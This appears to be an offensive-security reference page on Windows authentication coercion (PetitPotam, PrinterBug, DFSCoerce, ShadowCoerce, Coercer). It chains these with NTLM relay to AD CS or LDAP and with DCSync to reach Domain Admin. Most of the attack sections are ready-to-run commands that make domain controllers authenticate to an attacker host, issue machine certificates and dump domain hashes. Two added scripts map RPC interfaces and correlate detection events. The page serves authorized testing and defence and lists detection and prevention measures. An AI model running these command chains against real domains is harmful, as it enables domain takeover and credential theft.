Exploitation

Coercion Attacks

Force Windows servers to authenticate to attacker-controlled systems, enabling NTLM relay attacks, credential capture, and privilege escalation to Domain Admin.

Danger

Coercion attacks generate real authentication traffic from production domain controllers, and the relay chains below leave artifacts behind: certificates issued to machine accounts on the CA, new computer accounts, and msDS-AllowedToActOnBehalfOfOtherIdentity changes on DC computer objects. Coordinate with the client before testing and record everything that has to be revoked or reverted afterwards.

Attack Overview

Coercion attacks abuse Windows RPC protocols to force a target machine to authenticate to an attacker-controlled server. Combined with relay attacks, this can escalate to DA.

1. Coerce: force the DC to authenticate to the attacker host
2. Capture: intercept the NTLM authentication
3. Relay: forward it to LDAP, HTTP (AD CS) or SMB
4. Escalate: DCSync with the obtained DC$ credential, or RBCD

PetitPotam (MS-EFSRPC)

Abuse the Encrypting File System Remote Protocol (EfsRpcOpenFileRaw and related calls over \pipe\lsarpc or \pipe\efsrpc) to force authentication. The unauthenticated EfsRpcOpenFileRaw path was closed by the August 2021 update for CVE-2021-36942; with any valid domain credentials the other EFSRPC calls still trigger authentication on many hosts.

bash
# Unauthenticated (only on hosts missing the CVE-2021-36942 update)
python3 PetitPotam.py ATTACKER_IP DC_IP

# Authenticated (more reliable)
python3 PetitPotam.py -u user -p 'Password123' -d corp.local ATTACKER_IP DC_IP

# With NT hash (format is LMHASH:NTHASH; the LM part can be left empty)
python3 PetitPotam.py -u user -hashes :NTHASH -d corp.local ATTACKER_IP DC_IP

# Combined with AD CS relay
# Terminal 1: start the relay against the CA's web enrollment endpoint
ntlmrelayx.py -t http://CA_IP/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

# Terminal 2: trigger the coercion; the DC authenticates to ATTACKER_IP over SMB
python3 PetitPotam.py -u user -p 'Password123' -d corp.local ATTACKER_IP DC_IP

PrinterBug (MS-RPRN)

The classic "Printer Bug" abuses the Print Spooler service (RpcRemoteFindFirstPrinterChangeNotificationEx in MS-RPRN, reached over \pipe\spoolss) to trigger authentication. Requires the Print Spooler service running on the target and valid domain credentials.

bash
# Check whether the spooler endpoint is registered (MS-RPRN binds to \pipe\spoolss)
rpcdump.py DC_IP | grep -iE 'MS-RPRN|spoolss'

# Python printerbug (from krbrelayx)
python3 printerbug.py corp.local/user:Password123@DC_IP ATTACKER_IP

# SpoolSample from Windows (target first, then the capture server)
SpoolSample.exe DC_IP ATTACKER_IP

# Coercer, restricted to MS-RPRN
coercer coerce -u user -p 'Password123' -d corp.local -t DC_IP -l ATTACKER_IP --filter-protocol-name MS-RPRN

DFSCoerce (MS-DFSNM)

Abuse the Distributed File System Namespace Management protocol (NetrDfsAddStdRoot / NetrDfsRemoveStdRoot over \pipe\netdfs) for coercion. The DFS Namespace service runs on domain controllers by default, so this often works where PetitPotam is patched and the spooler is disabled.

bash
# DFSCoerce
python3 dfscoerce.py -u user -p 'Password123' -d corp.local ATTACKER_IP DC_IP

# Using Coercer, restricted to MS-DFSNM
coercer coerce -u user -p 'Password123' -d corp.local -t DC_IP -l ATTACKER_IP --filter-protocol-name MS-DFSNM

ShadowCoerce (MS-FSRVP)

Abuse the File Server Remote VSS Protocol (MS-FSRVP, \pipe\FssagentRpc) for coercion. Only works where the File Server VSS Agent Service role is installed, which is not the case on a default DC.

bash
# ShadowCoerce
python3 shadowcoerce.py -u user -p 'Password123' -d corp.local ATTACKER_IP DC_IP

# Using Coercer, restricted to MS-FSRVP
coercer coerce -u user -p 'Password123' -d corp.local -t DC_IP -l ATTACKER_IP --filter-protocol-name MS-FSRVP

Coercer - Universal Tool

Coercer is a comprehensive tool that tests multiple coercion methods automatically. Its scan mode runs its own listener and reports which methods produced a callback; its coerce mode points every method at a listener you run yourself (ntlmrelayx or Responder).

bash
# Install Coercer (provides the `coercer` command)
pip install coercer

# Scan for methods that produce a callback (Coercer listens itself, no -l needed)
coercer scan -u user -p 'Password123' -d corp.local -t DC_IP

# Coerce using all methods against your own listener on ATTACKER_IP
coercer coerce -u user -p 'Password123' -d corp.local -t DC_IP -l ATTACKER_IP

# Restrict to specific protocols (repeat the flag for each one)
coercer coerce -u user -p 'Password123' -d corp.local -t DC_IP -l ATTACKER_IP --filter-protocol-name MS-EFSRPC --filter-protocol-name MS-RPRN

# WebDAV coercion (forces HTTP instead of SMB). The WebClient service must be running on
# the target, and the listener must be named like an intranet host (short name, no dots)
coercer coerce -u user -p 'Password123' -d corp.local -t DC_IP -l ATTACKER_IP --webdav-host ATTACKER_HOST --webdav-port 80
# Same thing with PetitPotam's listener syntax
python3 PetitPotam.py -u user -p 'Password123' -d corp.local 'ATTACKER_HOST@80/x' DC_IP
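Before pointing Coercer at a host, it is worth reading which of the interfaces above the endpoint mapper actually registers. The script below is an added example, not code from the page, impacket or Coercer: it parses the text printed by impacket's rpcdump.py and maps registered interface UUIDs to the coercion methods in this section. The rpcdump output embedded in it is constructed to mimic the real layout; the host name DC01, its address and the filler UUID are assumptions.

```python
"""Map rpcdump.py output to the coercion interfaces a host exposes.

Added example; it is not part of the original page, impacket or Coercer.
The input is the text that impacket's `rpcdump.py TARGET` prints. The
SAMPLE_RPCDUMP below is constructed to mimic that layout, it is not a
real capture, and the host name and address in it are made up.
"""
import re

# RPC interface UUIDs behind each coercion method on the page, with the
# named pipe each one is normally reached through.
COERCION_INTERFACES = {
    "12345678-1234-abcd-ef00-0123456789ab": ("MS-RPRN", "PrinterBug", "spoolss"),
    "c681d488-d850-11d0-8c52-00c04fd90f7e": ("MS-EFSRPC", "PetitPotam", "lsarpc"),
    "df1941c5-fe89-4e79-bf10-463657acf44d": ("MS-EFSRPC", "PetitPotam", "efsrpc"),
    "4fc742e0-4a10-11cf-8273-00aa004ae673": ("MS-DFSNM", "DFSCoerce", "netdfs"),
    "a8e0653c-2744-4389-a61d-7373df8b2292": ("MS-FSRVP", "ShadowCoerce", "FssagentRpc"),
}

UUID_RE = re.compile(r"UUID\s*:\s*([0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12})")
BINDING_RE = re.compile(r"ncacn_\w+:\S+")


def parse_rpcdump(text):
    """Split rpcdump output into (uuid, [bindings]) per registered endpoint.

    rpcdump prints one blank-line-separated record per endpoint, each with a
    'UUID    :' line and a 'Bindings:' list of string bindings.
    """
    records = []
    for chunk in re.split(r"\n\s*\n", text.strip()):
        m = UUID_RE.search(chunk)
        if m:
            records.append((m.group(1).lower(), BINDING_RE.findall(chunk)))
    return records


def coercion_surface(text):
    """Return {method: {"protocol", "pipes", "bindings"}} for exposed coercion interfaces.

    Only interfaces in COERCION_INTERFACES are reported, so the result is the
    list of coercion methods worth trying before running Coercer against the host.
    """
    found = {}
    for uuid, bindings in parse_rpcdump(text):
        if uuid not in COERCION_INTERFACES:
            continue
        protocol, method, pipe = COERCION_INTERFACES[uuid]
        entry = found.setdefault(method, {"protocol": protocol, "pipes": [], "bindings": []})
        entry["pipes"].append(pipe)
        entry["bindings"].extend(bindings)
    return found


# Constructed sample in rpcdump's layout: spooler, EFSRPC and DFS registered,
# no FSRVP, plus one unrelated filler interface.
SAMPLE_RPCDUMP = r"""
Protocol: [MS-RPRN]: Print System Remote Protocol
Provider: spoolsv.exe
UUID    : 12345678-1234-ABCD-EF00-0123456789AB v1.0
Bindings:
          ncacn_ip_tcp:10.10.10.5[49676]
          ncacn_np:\\DC01[\pipe\spoolss]

Protocol: [MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol
Provider: efssvc.dll
UUID    : DF1941C5-FE89-4E79-BF10-463657ACF44D v1.0
Bindings:
          ncacn_np:\\DC01[\pipe\efsrpc]

Protocol: [MS-DFSNM]: Distributed File System (DFS) Namespace Management Protocol
Provider: dfssvc.exe
UUID    : 4FC742E0-4A10-11CF-8273-00AA004AE673 v3.0
Bindings:
          ncacn_np:\\DC01[\pipe\netdfs]

Protocol: N/A
Provider: N/A
UUID    : 11111111-2222-3333-4444-555555555555 v1.0
Bindings:
          ncacn_ip_tcp:10.10.10.5[49664]
"""


if __name__ == "__main__":
    for method, info in coercion_surface(SAMPLE_RPCDUMP).items():
        print(f"{method:13} {info['protocol']:10} via {', '.join(info['pipes'])}")
        for binding in info["bindings"]:
            print(f"    {binding}")
```

Feed it real output with `rpcdump.py DC_IP > dump.txt` and `coercion_surface(open("dump.txt").read())`. A registered interface only means the endpoint exists; whether the call actually triggers authentication still has to be confirmed with Coercer's scan mode.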

Full Attack Chain: Coercion → ADCS → DCSync

Complete privilege escalation from domain user to Domain Admin using coercion and ADCS.

bash
# Step 1: Start ntlmrelayx targeting the AD CS web enrollment endpoint
# (works when the CA accepts NTLM over HTTP without EPA; use https:// if plain HTTP is disabled)
ntlmrelayx.py -t http://CA_SERVER/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

# Step 2: Coerce DC authentication (new terminal)
python3 PetitPotam.py -u user -p 'Password123' -d corp.local ATTACKER_IP DC_IP

# Step 3: ntlmrelayx prints "Base64 certificate of user DC01$" followed by the PKCS#12 blob
# (recent impacket versions also write <account>.pfx to the working directory)
echo -n 'BASE64_FROM_NTLMRELAYX' | base64 -d > dc01.pfx

# Step 4: Authenticate with the certificate (PKINIT). Certipy saves a ccache and also
# recovers the account's NT hash, so either credential can be used for DCSync
certipy auth -pfx dc01.pfx -dc-ip DC_IP -username 'dc01$' -domain corp.local

# Step 5a: DCSync with the DC$ ticket. Kerberos needs the DC's FQDN, not its IP
export KRB5CCNAME='dc01$.ccache'   # filename as printed by certipy
secretsdump.py -k -no-pass 'corp.local/dc01$@dc01.corp.local' -just-dc

# Step 5b: or with the NT hash printed by certipy
secretsdump.py -hashes :DC01_NTHASH 'corp.local/dc01$@DC_IP' -just-dc

Alternative: Relay to LDAP for RBCD

bash
# When AD CS is not available, relay to LDAP and configure RBCD on the coerced DC's own
# computer object (the relayed DC$ account is allowed to write that attribute on itself).
# Preconditions: LDAP signing not enforced (for ldaps://, channel binding not enforced), and
# ms-DS-MachineAccountQuota > 0 or an account with an SPN that you already control.
# Coerced SMB authentication negotiates NTLM signing, so an SMB -> ldap:// relay is rejected
# by patched DCs. Coerce HTTP instead (WebDAV, needs the WebClient service on the target)
# or relay to ldaps://. The relay must target a different DC than the one being coerced.

# Step 1: Create the computer account that will be allowed to delegate
addcomputer.py -computer-name 'FAKE01$' -computer-pass 'Password123' -dc-ip DC2_IP corp.local/user:Password123

# Step 2: Start the relay; on success it writes msDS-AllowedToActOnBehalfOfOtherIdentity on DC01's object
ntlmrelayx.py -t ldaps://DC2_IP --delegate-access --escalate-user 'FAKE01$'

# Step 3: Coerce DC01 over HTTP (listener name without dots so WebClient treats it as intranet)
python3 PetitPotam.py -u user -p 'Password123' -d corp.local 'ATTACKER_HOST@80/x' DC01_IP

# Step 4: S4U2Self + S4U2Proxy for Administrator against DC01's CIFS service (use the FQDN)
getST.py -spn cifs/dc01.corp.local -impersonate Administrator -dc-ip DC2_IP 'corp.local/FAKE01$:Password123'

# Step 5: Use the ticket (getST.py prints the name of the ccache it saved)
export KRB5CCNAME=Administrator@cifs_dc01.corp.local@CORP.LOCAL.ccache
secretsdump.py -k -no-pass dc01.corp.local -just-dc

🔍 Detection & Prevention

Blue Team Indicators

Detection Opportunities

  • Event 5145 on a DC: IPC$ access to the pipes behind the coercion interfaces (efsrpc, lsarpc, spoolss, netdfs, FssagentRpc) from a client that is not a DC
  • Event 4624 logon type 3 with a DC machine account (DC01$) arriving from an address that is not a DC, logged on the relay target (CA web server, another DC)
  • Events 4886/4887 on the CA: certificate requests and issuances for machine accounts, especially with the DomainController template
  • Event 4768 on a DC with certificate information (PKINIT) for a DC machine account
  • Events 4741/4742 on a DC: new computer accounts and changes to msDS-AllowedToActOnBehalfOfOtherIdentity (RBCD)
  • Event 4662 with the DS-Replication-Get-Changes / DS-Replication-Get-Changes-All control access rights from a non-DC source (DCSync)

Prevention Measures

  • Apply the CVE-2021-36942 update (closes the unauthenticated EfsRpcOpenFileRaw path) and follow KB5005413 for AD CS: enable EPA on web enrollment and the certificate enrollment web services, and disable NTLM there where possible
  • Disable the Print Spooler service on DCs
  • Enforce LDAP signing and LDAP channel binding on DCs
  • Block the EFSRPC interfaces with an RPC filter where EFS is not needed (interface UUIDs c681d488-d850-11d0-8c52-00c04fd90f7e and df1941c5-fe89-4e79-bf10-463657acf44d)
  • Restrict outbound SMB (445) and HTTP/WebDAV from DCs at the host firewall, and keep the WebClient service disabled or uninstalled on servers
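The indicators above only become a strong signal when they line up: a coercion pipe touched on a DC, then that DC's machine account logging on somewhere from the same non-DC address, then a certificate, PKINIT logon or RBCD change for that account. The script below is an added example, not detection content from this page: it classifies event records into those stages and correlates them around each suspicious DC$ logon. The events are constructed dicts carrying the relevant fields of event IDs 5145, 4624, 4887, 4768 and 4742, not real log data; the DC accounts, DC addresses and host names are assumptions.

```python
"""Correlate Windows security events into a coercion -> relay -> escalation chain.

Added example; it is not detection content from the original page. The
SAMPLE_EVENTS below are constructed dicts carrying the fields of the real
event IDs (5145, 4624, 4887, 4768, 4742); they are not real log data, and the
DC accounts, DC addresses and host names are assumptions.
"""
from datetime import datetime, timedelta

# Named pipes behind the coercion RPC interfaces covered on the page.
COERCION_PIPES = {"efsrpc", "lsarpc", "spoolss", "netdfs", "fssagentrpc"}
DC_ACCOUNTS = {"DC01$", "DC02$"}        # assumed domain controller accounts
DC_IPS = {"10.10.10.5", "10.10.10.6"}   # assumed domain controller addresses
RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"
ESCALATION_STAGES = ("cert", "pkinit", "rbcd")
TS_FMT = "%Y-%m-%d %H:%M:%S"


def _acct(name):
    """Strip a DOMAIN\\ prefix so 'CORP\\DC01$' and 'DC01$' compare equal."""
    return name.split("\\")[-1].upper()


def classify(ev):
    """Map one event dict to (stage, src_ip, dc_account), or None if uninteresting."""
    eid = ev["id"]
    if (eid == 5145 and ev.get("share") == "IPC$"
            and ev.get("target", "").lower() in COERCION_PIPES
            and ev["src_ip"] not in DC_IPS):
        # A non-DC client opening a coercion pipe on a DC.
        return "coerce", ev["src_ip"], None
    if (eid == 4624 and ev.get("logon_type") == 3
            and _acct(ev["account"]) in DC_ACCOUNTS and ev["src_ip"] not in DC_IPS):
        # A DC machine account logging on from an address that is not a DC:
        # the relayed credential arriving at the relay target.
        return "relay", ev["src_ip"], _acct(ev["account"])
    if (eid == 4887 and _acct(ev["requester"]) in DC_ACCOUNTS
            and ev.get("template") == "DomainController"):
        return "cert", None, _acct(ev["requester"])
    if eid == 4768 and ev.get("certificate") and _acct(ev["account"]) in DC_ACCOUNTS:
        return "pkinit", ev.get("src_ip"), _acct(ev["account"])
    if eid == 4742 and ev.get("attribute") == RBCD_ATTR:
        return "rbcd", None, _acct(ev["target_account"])
    return None


def detect_chains(events, window=timedelta(minutes=30)):
    """Anchor on every relay hit; look for coercion before it and escalation after it.

    Severity is high when both a coercion and an escalation stage line up,
    medium when only one does, low for an unexplained DC$ logon from a non-DC.
    """
    hits = []
    for ev in events:
        c = classify(ev)
        if c:
            hits.append((datetime.strptime(ev["ts"], TS_FMT), ev["host"]) + c)
    alerts = []
    for t, host, stage, src_ip, account in hits:
        if stage != "relay":
            continue
        found = {"relay"}
        for t2, _, s2, ip2, acct2 in hits:
            if s2 == "coerce" and ip2 == src_ip and t - window <= t2 <= t:
                found.add("coerce")
            elif s2 in ESCALATION_STAGES and acct2 == account and t <= t2 <= t + window:
                found.add(s2)
        escalated = bool(found.intersection(ESCALATION_STAGES))
        if "coerce" in found and escalated:
            severity = "high"
        elif len(found) > 1:
            severity = "medium"
        else:
            severity = "low"
        alerts.append({
            "relay_target": host, "src_ip": src_ip, "account": account,
            "stages": [s for s in ("coerce", "relay") + ESCALATION_STAGES if s in found],
            "severity": severity,
        })
    return alerts


# Constructed sample: a PetitPotam -> AD CS relay -> PKINIT chain plus two benign events.
SAMPLE_EVENTS = [
    {"ts": "2024-03-01 10:00:00", "host": "DC01", "id": 5145, "share": "IPC$",
     "target": "efsrpc", "src_ip": "10.10.10.99", "account": "CORP\\jdoe"},
    {"ts": "2024-03-01 10:00:01", "host": "CA01", "id": 4624, "logon_type": 3,
     "account": "DC01$", "src_ip": "10.10.10.99"},
    {"ts": "2024-03-01 10:00:02", "host": "CA01", "id": 4887,
     "requester": "CORP\\DC01$", "template": "DomainController"},
    {"ts": "2024-03-01 10:03:00", "host": "DC01", "id": 4768, "account": "DC01$",
     "certificate": True, "src_ip": "10.10.10.99"},
    # Benign: DC-to-DC logon, and a user touching a non-coercion pipe.
    {"ts": "2024-03-01 10:05:00", "host": "DC02", "id": 4624, "logon_type": 3,
     "account": "DC01$", "src_ip": "10.10.10.5"},
    {"ts": "2024-03-01 10:06:00", "host": "DC01", "id": 5145, "share": "IPC$",
     "target": "srvsvc", "src_ip": "10.10.10.50", "account": "CORP\\jdoe"},
]


if __name__ == "__main__":
    for alert in detect_chains(SAMPLE_EVENTS):
        print(alert)
```

The relay stage is the anchor because it is the one event that must appear for any of these chains to work: the coerced DC$ credential has to land somewhere. Adding the legitimate DC addresses to DC_IPS is what keeps replication and DC-to-DC logons out of the alert; in a real deployment that list comes from the directory rather than a constant.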

Coercion Methods Reference

Method        Protocol    Auth required   Notes
PetitPotam    MS-EFSRPC   Optional        Most reliable; unauthenticated path closed by CVE-2021-36942, authenticated calls still work on many hosts
PrinterBug    MS-RPRN     Yes             Requires the Print Spooler service
DFSCoerce     MS-DFSNM    Yes             DFS Namespace service runs on DCs by default
ShadowCoerce  MS-FSRVP    Yes             Requires the File Server VSS Agent Service
Coercer       Multiple    Yes             Tests all of the above plus additional methods

External Resources

Practice Labs

Practice coercion attacks in safe environments:

  • Return (Hack The Box, easy): PrinterBug, service abuse
  • Escape (Hack The Box, medium): PetitPotam, AD CS relay
  • Exploiting AD (TryHackMe, hard): coercion, NTLM relay